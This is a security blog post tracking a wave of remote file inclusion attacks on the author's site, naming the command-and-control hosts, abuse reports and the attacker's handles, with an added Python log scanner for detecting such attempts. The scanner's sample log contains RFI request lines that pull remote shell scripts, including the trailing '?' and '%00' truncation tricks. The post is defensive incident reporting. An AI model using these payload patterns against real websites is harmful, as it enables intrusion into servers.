I noticed an increase of the "generic attacks" on my website over the last few days: http://www.malekal.com/modsec/ (blue line on the first graph).
A check shows that some RFI attacks are increasing.
All the attacks against my websites (42 distinct IPs, so not that many):
The RFI attacks were trying to download a Perl script that connects to scary.angels-agency.nl
and then connects to 188.8.131.52 (also using the DNS name ha45k.hopto.org).
I sent an abuse report for this.
As a result:
no-ip has moved it: ha45k.hopto.org has address 0.0.0.0
and scary.angels-agency.nl is also suspended.
184.108.40.206 is still up.
Actually, the RFI attacks send a script to gather information from the victim server (and to check whether the RFI attack was successful):
the bt.php is still around, and now connects to 220.127.116.11, already mentioned in the abuse email I sent.
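The signature of an RFI attempt in the web server log is a query parameter whose value is itself an absolute URL pointing at a remote host (the attacker's script), often with a trailing `?` or `%00` to cut off whatever the vulnerable include appends. The following is an added example, not code from this blog or from ModSecurity: a small Python script that scans Apache combined-format log lines for such parameters and groups the attempts per source IP and per remote host, which is roughly the count shown above. The log lines and hosts are constructed for the example and are not real traffic.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, urlparse

# Constructed Apache combined-log sample (placeholder IPs and hosts, not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [20/Feb/2014:10:01:02 +0100] "GET /index.php?page=http://198.51.100.7/bt.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.10 - - [20/Feb/2014:10:01:05 +0100] "GET /plugins/x/foo.php?path=ftp://198.51.100.7/shell.txt%00 HTTP/1.1" 404 0 "-" "Mozilla/5.0"
198.51.100.22 - - [20/Feb/2014:10:02:11 +0100] "GET /index.php?page=about HTTP/1.1" 200 2048 "http://www.example.org/" "Mozilla/5.0"
203.0.113.55 - - [20/Feb/2014:10:03:30 +0100] "GET /test.php?inc=https://evil.example.net/r57.txt?? HTTP/1.0" 403 199 "-" "libwww-perl/6.05"
203.0.113.55 - - [20/Feb/2014:10:03:31 +0100] "POST /login.php HTTP/1.1" 302 0 "-" "libwww-perl/6.05"
"""

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Schemes PHP's include() will happily fetch when allow_url_include is on.
REMOTE_SCHEMES = ("http", "https", "ftp")


def is_rfi_value(value: str) -> bool:
    """True when a parameter value is an absolute URL with a host (the RFI signature)."""
    try:
        u = urlparse(value)
    except ValueError:
        return False
    return u.scheme.lower() in REMOTE_SCHEMES and bool(u.netloc)


def rfi_indicators(target: str):
    """Return (param, value) pairs in the request target whose value points at a remote host."""
    query = urlparse(target).query
    # keep_blank_values so a bare "?page=" does not shift the remaining pairs
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True) if is_rfi_value(v)]


def analyse(log_text: str):
    """Group RFI attempts by source IP and count which remote hosts are being pulled in."""
    per_ip = defaultdict(list)
    remote_hosts = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hits = rfi_indicators(m["target"])
        if not hits:
            continue
        per_ip[m["ip"]].extend(hits)
        for _, value in hits:
            remote_hosts[urlparse(value).netloc.lower()] += 1
    return dict(per_ip), remote_hosts


if __name__ == "__main__":
    attackers, hosts = analyse(SAMPLE_LOG)
    print(f"{len(attackers)} distinct source IPs with RFI attempts")
    for ip, hits in attackers.items():
        for param, value in hits:
            print(f"  {ip}  {param}={value!r}")
    print("remote hosts used as payload source:")
    for host, n in hosts.most_common():
        print(f"  {host}: {n}")
```

The remote-host counter is the useful part for the abuse report: it tells you which hosting provider or dynamic-DNS name is serving the payload, independently of how many bot IPs are throwing the request. Run it over a real access log by replacing `SAMPLE_LOG` with the file contents.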
Some shells around:
and the RFI attacks sent by the botmaster:
The guy Ha45K seems to be active on the HF forum and the unknown.eu forum.
He is also using the nickname TijN (used in the identd): download.adamas.ai/dlbase/ezines/TeaMp0isoN/ezine1.txt
And he has been doing this for a while now, since April 2013: https://defense.ballastsecurity.net/decoding/?raw=36173d0a9b460a8089d55086d39aa77d
EDIT – February 24
It seems Ha45K has read this entry and is trying to spam something:
and some spam attacks:
We can see the generic attacks peak: http://www.malekal.com/modsec/index.php
They moved to 18.104.22.168 (OVH) and 22.214.171.124 (THEFIRST-NET, RU).
OVH has done the job and 126.96.36.199 is clean now.
By the way, another active RFI group: LebayCrew
IRCd: 188.8.131.52 (REDCOM-SRV-WEBHOST, RU)
Some scans :
Securing your website
You can also take a look at the page: [network] Securing an Apache/PHP/MySQL (LAMP) server, and the index leading to various resources for securing your website.